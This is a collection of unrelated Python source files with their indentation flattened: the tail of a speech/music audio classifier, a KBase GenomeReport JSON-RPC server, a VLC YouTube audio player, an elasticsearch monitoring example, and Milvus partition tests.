results["mfcc"] = result_mfcc
# Make a decision and add to blocks
final_result = decide(results)
# Add to successive blocks
if final_result > 0.5:
succ_music += 1
succ_speech = 0
else:
succ_speech += 1
succ_music = 0
result_str = "SPEECH" if final_result <= 0.5 else "MUSIC"
print("FINAL RESULT: ", final_result, " => " + result_str)
print("Successive music blocks: ", succ_music)
print("Successive speech blocks: ", succ_speech)
# Fadeout the track if the currently played type does not correspond to what was specified via the command line
# 4 blocks provide a good user experience because sometimes single or double blocks are classified wrong
if listening_preference == "music":
if succ_speech > 4 and not is_replacement:
mixer.music.load(replacement_path)
mixer.music.fadeout(300)
mixer.music.play()
is_replacement = True
if succ_music > 4 and is_replacement:
is_replacement = False
mixer.music.fadeout(300)
if listening_preference == "speech":
if succ_music > 4 and not is_replacement:
mixer.music.load(replacement_path)
mixer.music.fadeout(300)
mixer.music.play()
is_replacement = True
if succ_speech > 4 and is_replacement:
is_replacement = False
mixer.music.fadeout(300)
if not is_replacement:
# Play audio stream
mixer.music.load(wav_path)
mixer.music.play()
i += 1
# Measure execution time
end = time.time()
print("Elapsed Time: ", str(end - start))
print()
def calc_from_file(file, filename, clf_mfcc, scaler_mfcc, is_mfcc, is_cfa):
"""
Classifies an mp3 audio file and saves the results in a CSV and PNG file. See "plots" folder.
:param file: The file to classify.
:param filename: The filename. Used to save the CSV and PNG files.
:param clf_mfcc: The trained neural network classifier for MFCC classification
:param scaler_mfcc: The scaler instance used to scaled the original MFCC training data
:param is_mfcc: If the MFCC value should be calculated and taken into consideration for the final result
:param is_cfa: If the CFA value should be calculated and taken into consideration for the final result
:return: An array containing the range of seconds of the duration of the file in steps of 0.5s. The generated speech_music_map
"""
speech_music_map = []
succ_speech = 0
succ_music = 0
path = file
wav_path = ac.mp3_to_16_khz_wav(path)
# Preprocess audio
sig, rate, frequencies, times, spectrogram = Processing.preprocessing(wav_path)
half_seconds = math.ceil(util.get_wav_duration(wav_path) * 2)
mixer.init(frequency=16000, channels=1)
mixer.music.load(wav_path)
mixer.music.play()
time_per_iteration = 0
i = 0
for i in range(half_seconds):
# Take time
start = time.time()
results = {}
print("Current: ")
# Use features specified in command line arguments
if is_mfcc:
# MFCC classification
startidx = math.floor(len(sig) * i / half_seconds)
endidx = math.ceil(len(sig) * (i + 1) / half_seconds)
current_mfcc = MFCC.read_mfcc(sig[startidx:endidx], rate)
result_mfcc = [-1]
thread_mfcc = threading.Thread(
target=Output.print_mfcc(current_mfcc, clf_mfcc, scaler_mfcc, result_mfcc, 9), args=(10,))
if is_cfa:
startidx = math.floor(spectrogram.shape[1] * i / half_seconds)
endidx = math.ceil(spectrogram.shape[1] * (i + 1) / half_seconds)
# CFA classification
cfa, peakis = CFA.calculate_cfa(spec=spectrogram[:, startidx:endidx], threshold=cfa_threshold)
result = round(cfa, 4)
results["cfa"] = result
print("CFA Music: " + str(result))
if is_mfcc:
thread_mfcc.start()
thread_mfcc.join()
results["mfcc"] = result_mfcc
# Make a decision and add to blocks
final_result = decide(results)
# Add to successive blocks
if final_result > 0.5:
succ_music += 1
succ_speech = 0
speech_music_map.append(1)
else:
succ_speech += 1
succ_music = 0
speech_music_map.append(0)
result_str = "SPEECH" if final_result <= 0.5 else "MUSIC"
print("FINAL RESULT: ", final_result, " => " + result_str)
print("Successive music blocks: ", succ_music)
print("Successive speech blocks: ", succ_speech)
i += 1
# Measure execution time
end = time.time()
elapsed = end - start
time_per_iteration += elapsed if i > 1 else 0 # First iteration takes longer as numba caches all the functions
print("Elapsed Time: ", str(elapsed))
print()
# Save CSV and PNG of sequence of classified data (speech_music_map)
x = np.arange(len(speech_music_map)) / 2 # Convert from samples (every 0.5s to seconds)
util.plot_speech_music_map(filename, x, speech_music_map, save_csv=True)
print("Average time per iteration: ", str(time_per_iteration / i))
return x, speech_music_map
def clear_streams():
"""
Clear all files from the "data/test" folder (contains previous streams)
:return:
"""
for p in Path("data/test").glob("*.wav"):
p.unlink()
|
GenomeReportServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GenomeReport.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GenomeReport'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GenomeReport.GenomeReportImpl import GenomeReport # noqa @IgnorePep8
impl_GenomeReport = GenomeReport(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GenomeReport'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GenomeReport.create_genome_report,
name='GenomeReport.create_genome_report',
types=[dict])
self.method_authentication['GenomeReport.create_genome_report'] = 'required' # noqa
self.rpc_service.add(impl_GenomeReport.status,
name='GenomeReport.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GenomeReport ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
player.py
|
import queue, pafy, youtube_dl, vlc, threading, sys, os
from enum import Enum
JobTypes = {'ADD':0,'PLAY':1,'PAUSE':2,'STOP':3,'EXIT':10}
jobQueue = queue.Queue()
def enqueue_job(job):
jobQueue.put(job)
class Player:
def __init__(self):
self._player = vlc.MediaPlayer()
self._video = None
self._audiostream = None
def setVideo(self, url):
self._video = pafy.new(url)
self._audiostream = self._video.getbestaudio()
self._player.set_mrl(self._audiostream.url)
def play(self):
self._player.play()
def pause(self):
self._player.pause()
def isPlaying(self):
return self._player.isPlaying()
def stop(self):
self._player.stop()
class PlayerThread:
def __init__(self):
self.thread = threading.Thread(target=self._run, name='player-thread', daemon=True)
self.thread.start()
def _run(self):
audiostream = Player()
while True:
# block on queue if its empty
job = jobQueue.get()
if (job[0] == JobTypes['ADD']):
audiostream.setVideo(job[1])
elif (job[0] == JobTypes['PLAY']):
audiostream.play()
elif (job[0] == JobTypes['PAUSE']):
audiostream.pause()
elif (job[0] == JobTypes['STOP']):
audiostream.stop()
elif (job[0] == JobTypes['EXIT']):
os._exit(1)
jobQueue.task_done()
|
example_multithread.py
|
import argparse
import collections
import time
import threading
from py_elasticinfra.utils.parse_config import ConfigParser
from py_elasticinfra.elk.elastic import Indexer
from py_elasticinfra.runner import Runner
def foreground_thread():
for i in range(5):
time.sleep(3)
print('[INFO] Foreground thread, iteration {}'.format(i+1))
def main(config):
# connect to elasticsearch
es = Indexer(config)
es.connect()
es.create_index()
# initialize threads and run in parallel
runner = Runner(config, es)
runner.run_background()
thread_main = threading.Thread(name="foreground_thread",
target=foreground_thread)
thread_main.start()
time.sleep(5)
runner.stop_background()
if __name__ == "__main__":
args = argparse.ArgumentParser(description="py_elasticinfra")
args.add_argument("-c", "--config", default=None, type=str,
help="config file path (default: None)")
# custom cli options to modify configuration
# from default values given in json file.
custom_args = collections.namedtuple("custom_args", "flags type target")
options = [
custom_args(["--elk", "--elk_host"], type=str,
target=("elk", "host"))
]
config = ConfigParser(parse_args=True, args=args, options=options)
config.init_logger()
main(config)
|
test_partition.py
|
import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_unique_str(prefix), cf.gen_unique_str("desc_"))])
def test_partition_default(self, partition_name, description):
"""
target: verify create a partition
method: 1. create a partition
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
# @pytest.mark.xfail(reason="issue #5375")
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empyt name
method: 1. create a partition empty none name
expected: 1. raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description", [(cf.gen_unique_str(prefix), "")])
def test_partition_empty_description(self, partition_name, description):
"""
target: verify create a partition with empty description
method: 1. create a partition with empty description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_str_by_length(255), cf.gen_str_by_length(2048))])
def test_partition_max_description_length(self, partition_name, description):
"""
target: verify create a partition with 255 length name and 1024 length description
method: 1. create a partition with 255 length name and 1024 length description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection_name, partition_name, description",
[(cf.gen_unique_str(), cf.gen_unique_str(prefix), cf.gen_unique_str())])
def test_partition_dup_name(self, collection_name, partition_name, description):
"""
target: verify create partitions with duplicate name
method: 1. create partitions with duplicate name
expected: 1. create successfully
2. the same partition returned with diff object id
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_special_chars_description(self, partition_name, description):
"""
target: verify create a partition with special characters in description
method: 1. create a partition with special characters in description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: 1. the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_str_by_length(256)])
def test_partition_maxlength_name(self, partition_name):
"""
target: verify create a partition with maxlength(256) name
method: 1. create a partition with max length names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: 1. create a partition with invalid names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_none_collection(self, partition_name):
"""
target: verify create a partition with none collection
method: 1. create a partition with none collection
expected: 1. raise exception
"""
# create partition with collection is None
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus_orm.Collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop(self, partition_name):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: 1. drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("search_vectors", [cf.gen_vectors(1, ct.default_dim)])
def test_partition_release(self, search_vectors):
"""
target: verify release partition
method: 1. create a collection and several partitions
2. insert data into each partition
3. flush and load the partitions
4. release partition1
5. release partition1 twice
expected: 1. the released partition is released
2. the other partition is not released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
@pytest.mark.parametrize("data, nums", [(cf.gen_default_dataframe_data(10), 10),
(cf.gen_default_list_data(1), 1),
(cf.gen_default_tuple_data(10), 10)])
def test_partition_insert(self, partition_name, data, nums):
"""
target: verify insert multi entities by dataFrame
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: 1. insert data successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_dropped_collection(self, partition_name):
"""
target: verify create partition against a dropped collection
method: 1. create collection1
2. drop collection1
3. create partition in collection1
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_same_name_in_diff_collections(self, partition_name):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: 1. create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: 1. create multiple partitions in one collection
